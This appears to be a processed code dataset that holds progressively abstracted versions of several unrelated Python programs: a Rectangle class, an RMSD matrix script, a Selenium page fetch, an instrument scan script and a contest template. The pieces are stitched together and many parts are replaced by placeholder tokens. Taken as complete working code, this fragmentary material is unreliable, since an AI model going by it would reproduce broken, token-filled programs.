def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n <function token>\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n <function token>\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n <function token>\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n <function token>\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n <function token>\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n <function token>\n <function token>\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n <function token>\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n <function token>\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n <function token>\n <function token>\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n <function token>\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n <function token>\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n <function token>\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n <function token>\n <function token>\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n <function token>\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n <function token>\n <function token>\n <function token>\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n <function token>\n <function token>\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n <function token>\n <function token>\n <function token>\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n <function token>\n <function token>\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n<class token>\n"
] | false |
99,872 | fd1d3408e3eb723beebdd5939d9d955ad592bdca | #!/usr/bin/env python3
import sys
import numpy as np
from rmsdlib import multifit
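# Command-line arguments: <coords1.npy> <coords2.npy> <atom-index-file-1> <atom-index-file-2> <output.npy>
# Builds the pairwise RMSD matrix (as reported by rmsdlib.multifit) between the two coordinate
# libraries, keeping only the listed atoms and fitting every structure of the second library
# onto each structure of the first.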
def fit_multi_npy(a, ref):
#print(np.shape(a))
#print(np.shape(ref))
rotation, translation, RMSD = multifit(a, ref)
rot = np.transpose(rotation, axes=(0,2,1))
COM = a.sum(axis=1)/a.shape[1]
centered = a - COM[:,None,:]
rotated = np.einsum('...ij,...jk->...ik',centered,rot)
fitted = rotated + COM[:,None,:]
translated = fitted - translation[:,None,:]
return RMSD
at1 = [ int(l.split()[0])-1 for l in open(sys.argv[3]).readlines()]
at2 = [ int(l.split()[0])-1 for l in open(sys.argv[4]).readlines()]
lib1 = np.load(sys.argv[1])[:,at1]
lib2 = np.load(sys.argv[2])[:,at2]
outfile=sys.argv[5]
comp_matrix = np.zeros((len(lib1), len(lib2)))
n = 0
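# comp_matrix[n, m] holds the RMSD of lib2[m] with respect to lib1[n].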
for conf1 in lib1:
rmsd = fit_multi_npy(lib2, conf1)
comp_matrix[n] = rmsd
n+=1
np.save(outfile, comp_matrix)
| [
"#!/usr/bin/env python3\n\nimport sys\nimport numpy as np\nfrom rmsdlib import multifit\n\ndef fit_multi_npy(a, ref):\n #print(np.shape(a))\n #print(np.shape(ref))\n rotation, translation, RMSD = multifit(a, ref)\n rot = np.transpose(rotation, axes=(0,2,1))\n COM = a.sum(axis=1)/a.shape[1]\n centered = a - COM[:,None,:]\n rotated = np.einsum('...ij,...jk->...ik',centered,rot)\n fitted = rotated + COM[:,None,:]\n translated = fitted - translation[:,None,:]\n return RMSD\n\nat1 = [ int(l.split()[0])-1 for l in open(sys.argv[3]).readlines()]\nat2 = [ int(l.split()[0])-1 for l in open(sys.argv[4]).readlines()]\n\nlib1 = np.load(sys.argv[1])[:,at1]\nlib2 = np.load(sys.argv[2])[:,at2]\n\noutfile=sys.argv[5]\n\ncomp_matrix = np.zeros((len(lib1), len(lib2)))\n\nn = 0\nfor conf1 in lib1:\n rmsd = fit_multi_npy(lib2, conf1)\n comp_matrix[n] = rmsd\n n+=1\n\nnp.save(outfile, comp_matrix)\n",
"import sys\nimport numpy as np\nfrom rmsdlib import multifit\n\n\ndef fit_multi_npy(a, ref):\n rotation, translation, RMSD = multifit(a, ref)\n rot = np.transpose(rotation, axes=(0, 2, 1))\n COM = a.sum(axis=1) / a.shape[1]\n centered = a - COM[:, None, :]\n rotated = np.einsum('...ij,...jk->...ik', centered, rot)\n fitted = rotated + COM[:, None, :]\n translated = fitted - translation[:, None, :]\n return RMSD\n\n\nat1 = [(int(l.split()[0]) - 1) for l in open(sys.argv[3]).readlines()]\nat2 = [(int(l.split()[0]) - 1) for l in open(sys.argv[4]).readlines()]\nlib1 = np.load(sys.argv[1])[:, at1]\nlib2 = np.load(sys.argv[2])[:, at2]\noutfile = sys.argv[5]\ncomp_matrix = np.zeros((len(lib1), len(lib2)))\nn = 0\nfor conf1 in lib1:\n rmsd = fit_multi_npy(lib2, conf1)\n comp_matrix[n] = rmsd\n n += 1\nnp.save(outfile, comp_matrix)\n",
"<import token>\n\n\ndef fit_multi_npy(a, ref):\n rotation, translation, RMSD = multifit(a, ref)\n rot = np.transpose(rotation, axes=(0, 2, 1))\n COM = a.sum(axis=1) / a.shape[1]\n centered = a - COM[:, None, :]\n rotated = np.einsum('...ij,...jk->...ik', centered, rot)\n fitted = rotated + COM[:, None, :]\n translated = fitted - translation[:, None, :]\n return RMSD\n\n\nat1 = [(int(l.split()[0]) - 1) for l in open(sys.argv[3]).readlines()]\nat2 = [(int(l.split()[0]) - 1) for l in open(sys.argv[4]).readlines()]\nlib1 = np.load(sys.argv[1])[:, at1]\nlib2 = np.load(sys.argv[2])[:, at2]\noutfile = sys.argv[5]\ncomp_matrix = np.zeros((len(lib1), len(lib2)))\nn = 0\nfor conf1 in lib1:\n rmsd = fit_multi_npy(lib2, conf1)\n comp_matrix[n] = rmsd\n n += 1\nnp.save(outfile, comp_matrix)\n",
"<import token>\n\n\ndef fit_multi_npy(a, ref):\n rotation, translation, RMSD = multifit(a, ref)\n rot = np.transpose(rotation, axes=(0, 2, 1))\n COM = a.sum(axis=1) / a.shape[1]\n centered = a - COM[:, None, :]\n rotated = np.einsum('...ij,...jk->...ik', centered, rot)\n fitted = rotated + COM[:, None, :]\n translated = fitted - translation[:, None, :]\n return RMSD\n\n\n<assignment token>\nfor conf1 in lib1:\n rmsd = fit_multi_npy(lib2, conf1)\n comp_matrix[n] = rmsd\n n += 1\nnp.save(outfile, comp_matrix)\n",
"<import token>\n\n\ndef fit_multi_npy(a, ref):\n rotation, translation, RMSD = multifit(a, ref)\n rot = np.transpose(rotation, axes=(0, 2, 1))\n COM = a.sum(axis=1) / a.shape[1]\n centered = a - COM[:, None, :]\n rotated = np.einsum('...ij,...jk->...ik', centered, rot)\n fitted = rotated + COM[:, None, :]\n translated = fitted - translation[:, None, :]\n return RMSD\n\n\n<assignment token>\n<code token>\n",
"<import token>\n<function token>\n<assignment token>\n<code token>\n"
] | false |
99,873 | 699a94ccd6ddb2f3f87975ca73bc9a518eb3e294 | from selenium import webdriver
import time
url="https://car.autohome.com.cn/config/spec/1000001.html"
driver=webdriver.PhantomJS()
driver.get(url)
print(driver.page_source) | [
"from selenium import webdriver\nimport time\n\nurl=\"https://car.autohome.com.cn/config/spec/1000001.html\"\ndriver=webdriver.PhantomJS()\n\ndriver.get(url)\n\nprint(driver.page_source)",
"from selenium import webdriver\nimport time\nurl = 'https://car.autohome.com.cn/config/spec/1000001.html'\ndriver = webdriver.PhantomJS()\ndriver.get(url)\nprint(driver.page_source)\n",
"<import token>\nurl = 'https://car.autohome.com.cn/config/spec/1000001.html'\ndriver = webdriver.PhantomJS()\ndriver.get(url)\nprint(driver.page_source)\n",
"<import token>\n<assignment token>\ndriver.get(url)\nprint(driver.page_source)\n",
"<import token>\n<assignment token>\n<code token>\n"
] | false |
99,874 | 9f14bddb75d1020d23cd000f4e0daf31639ef658 | # Script control setup area
# script info
__script__.title = 'Scan vsamphi'
__script__.version = '0.1'
G1 = Group('Scan on vsamphi')
device_name = 'vsamphi'
arm_length = Par('float', 0)
scan_start = Par('float', 0)
scan_stop = Par('float', 0)
number_of_points = Par('int', 0)
scan_mode = Par('string', 'time', options = ['time', 'count'])
scan_mode.enabled = True
scan_preset = Par('int', 0)
act1 = Act('scan_device()', 'Scan on Device')
def scan_device():
aname = str(device_name)
# axis_name.value = aname
np = int(number_of_points.value)
if np <= 0:
return
if np == 1:
step_size = 0
else:
step_size = float(scan_stop.value - scan_start.value) / (np - 1)
slog('runscan ' + str(device_name) + ' ' + str(scan_start.value) + ' ' + str(scan_stop.value) \
+ ' ' + str(number_of_points.value) + ' ' + str(scan_mode.value) + ' ' + str(scan_preset.value))
if str(scan_mode.value) == 'time' :
mode = quokka.hmMode.time
elif str(scan_mode.value) == 'count':
mode = quokka.hmMode.monitor
else:
mode = quokka.hmMode.time
sics.run_command('newfile HISTOGRAM_XY')
org_z = sicsext.getStableValue('samz').getFloatData()
time.sleep(1)
for p in xrange(np):
samphi = scan_start.value + step_size * p
slog('drive ' + aname + ' ' + str(samphi))
sics.drive('samphi', scan_start.value + step_size * p)
samz = calc_samz(samphi, arm_length.value, org_z)
slog('drive samz ' + str(samz))
sics.drive('samz', samz)
quokka.driveHistmem(mode, scan_preset.value)
sics.run_command('save ' + str(p))
slog('finished NP ' + str(p))
time.sleep(1)
G1.add(arm_length, scan_start, scan_stop, number_of_points, scan_mode, scan_preset, act1)
def calc_samz(samphi, length, org_z):
return org_z - length * math.sin(samphi * math.pi / 180)
# Use below example to create a new Plot
# Plot4 = Plot(title = 'new plot')
# This function is called when pushing the Run button in the control UI.
def __run_script__(fns):
global Plot1
global Plot2
global Plot3
# check if a list of file names has been given
if (fns is None or len(fns) == 0) :
print 'no input datasets'
else :
for fn in fns:
# load dataset with each file name
ds = Plot3.ds
if ds != None and len(ds) > 0:
if ds[0].location == fn:
return
df.datasets.clear()
ds = df[fn]
axis_name = 'samphi'
dname = 'total_counts'
data = ds[dname]
axis = ds[axis_name]
if not hasattr(axis, '__len__'):
axis = SimpleData([axis], title = axis_name)
ds2 = Dataset(data, axes=[axis])
ds2.title = ds.id
ds2.location = fn
Plot1.set_dataset(ds2)
Plot1.x_label = axis_name.value
Plot1.y_label = dname
Plot1.title = dname + ' vs ' + axis_name.value
Plot1.pv.getPlot().setMarkerEnabled(True)
def __dispose__():
global Plot1
global Plot2
global Plot3
Plot1.clear()
Plot2.clear()
Plot3.clear()
| [
"# Script control setup area\r\n# script info\r\n__script__.title = 'Scan vsamphi'\r\n__script__.version = '0.1'\r\n\r\nG1 = Group('Scan on vsamphi')\r\ndevice_name = 'vsamphi'\r\narm_length = Par('float', 0)\r\nscan_start = Par('float', 0)\r\nscan_stop = Par('float', 0)\r\nnumber_of_points = Par('int', 0)\r\nscan_mode = Par('string', 'time', options = ['time', 'count'])\r\nscan_mode.enabled = True\r\nscan_preset = Par('int', 0)\r\nact1 = Act('scan_device()', 'Scan on Device')\r\ndef scan_device():\r\n aname = str(device_name)\r\n# axis_name.value = aname\r\n np = int(number_of_points.value)\r\n if np <= 0:\r\n return\r\n if np == 1:\r\n step_size = 0\r\n else:\r\n step_size = float(scan_stop.value - scan_start.value) / (np - 1)\r\n slog('runscan ' + str(device_name) + ' ' + str(scan_start.value) + ' ' + str(scan_stop.value) \\\r\n + ' ' + str(number_of_points.value) + ' ' + str(scan_mode.value) + ' ' + str(scan_preset.value))\r\n if str(scan_mode.value) == 'time' :\r\n mode = quokka.hmMode.time\r\n elif str(scan_mode.value) == 'count':\r\n mode = quokka.hmMode.monitor\r\n else:\r\n mode = quokka.hmMode.time\r\n sics.run_command('newfile HISTOGRAM_XY')\r\n org_z = sicsext.getStableValue('samz').getFloatData()\r\n time.sleep(1)\r\n for p in xrange(np):\r\n samphi = scan_start.value + step_size * p\r\n slog('drive ' + aname + ' ' + str(samphi))\r\n sics.drive('samphi', scan_start.value + step_size * p)\r\n samz = calc_samz(samphi, arm_length.value, org_z)\r\n slog('drive samz ' + str(samz))\r\n sics.drive('samz', samz)\r\n quokka.driveHistmem(mode, scan_preset.value)\r\n sics.run_command('save ' + str(p))\r\n slog('finished NP ' + str(p))\r\n time.sleep(1)\r\n \r\nG1.add(arm_length, scan_start, scan_stop, number_of_points, scan_mode, scan_preset, act1)\r\n\r\n\r\ndef calc_samz(samphi, length, org_z):\r\n return org_z - length * math.sin(samphi * math.pi / 180)\r\n \r\n# Use below example to create a new Plot\r\n# Plot4 = Plot(title = 'new plot')\r\n\r\n# This function is called when pushing the Run button in the control UI.\r\ndef __run_script__(fns):\r\n global Plot1\r\n global Plot2\r\n global Plot3\r\n \r\n # check if a list of file names has been given\r\n if (fns is None or len(fns) == 0) :\r\n print 'no input datasets'\r\n else :\r\n for fn in fns:\r\n # load dataset with each file name\r\n ds = Plot3.ds\r\n if ds != None and len(ds) > 0:\r\n if ds[0].location == fn:\r\n return\r\n df.datasets.clear()\r\n ds = df[fn]\r\n axis_name = 'samphi'\r\n dname = 'total_counts'\r\n data = ds[dname]\r\n axis = ds[axis_name]\r\n if not hasattr(axis, '__len__'):\r\n axis = SimpleData([axis], title = axis_name)\r\n ds2 = Dataset(data, axes=[axis])\r\n ds2.title = ds.id\r\n ds2.location = fn\r\n Plot1.set_dataset(ds2)\r\n Plot1.x_label = axis_name.value\r\n Plot1.y_label = dname\r\n Plot1.title = dname + ' vs ' + axis_name.value\r\n Plot1.pv.getPlot().setMarkerEnabled(True)\r\n\r\n \r\ndef __dispose__():\r\n global Plot1\r\n global Plot2\r\n global Plot3\r\n Plot1.clear()\r\n Plot2.clear()\r\n Plot3.clear()\r\n"
] | true |
99,875 | 35899b6b0f382467c1fdbacf425ed65eced1d5b4 | #!/usr/bin/env python3
# Generated by AtCoder Tools 2.8.0
# Copyright 2021 Yuichiro Smith
import sys
MOD = 998244353 # type: int
def solve(N: int, Q: int, A: "List[int]", x: "List[int]", y: "List[int]"):
return
def main():
def iterate_tokens():
for line in sys.stdin:
for word in line.split():
yield word
tokens = iterate_tokens()
N = int(next(tokens)) # type: int
Q = int(next(tokens)) # type: int
A = [int(next(tokens)) for _ in range(N)] # type: "List[int]"
x = [int()] * (Q) # type: "List[int]"
y = [int()] * (Q) # type: "List[int]"
for i in range(Q):
x[i] = int(next(tokens))
y[i] = int(next(tokens))
solve(N, Q, A, x, y)
if __name__ == '__main__':
main()
| [
"#!/usr/bin/env python3\n# Generated by AtCoder Tools 2.8.0\n# Copyright 2021 Yuichiro Smith\nimport sys\n\nMOD = 998244353 # type: int\n\n\ndef solve(N: int, Q: int, A: \"List[int]\", x: \"List[int]\", y: \"List[int]\"):\n return\n\n\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n Q = int(next(tokens)) # type: int\n A = [int(next(tokens)) for _ in range(N)] # type: \"List[int]\"\n x = [int()] * (Q) # type: \"List[int]\"\n y = [int()] * (Q) # type: \"List[int]\"\n for i in range(Q):\n x[i] = int(next(tokens))\n y[i] = int(next(tokens))\n solve(N, Q, A, x, y)\n\n\nif __name__ == '__main__':\n main()\n",
"import sys\nMOD = 998244353\n\n\ndef solve(N: int, Q: int, A: 'List[int]', x: 'List[int]', y: 'List[int]'):\n return\n\n\ndef main():\n\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens))\n Q = int(next(tokens))\n A = [int(next(tokens)) for _ in range(N)]\n x = [int()] * Q\n y = [int()] * Q\n for i in range(Q):\n x[i] = int(next(tokens))\n y[i] = int(next(tokens))\n solve(N, Q, A, x, y)\n\n\nif __name__ == '__main__':\n main()\n",
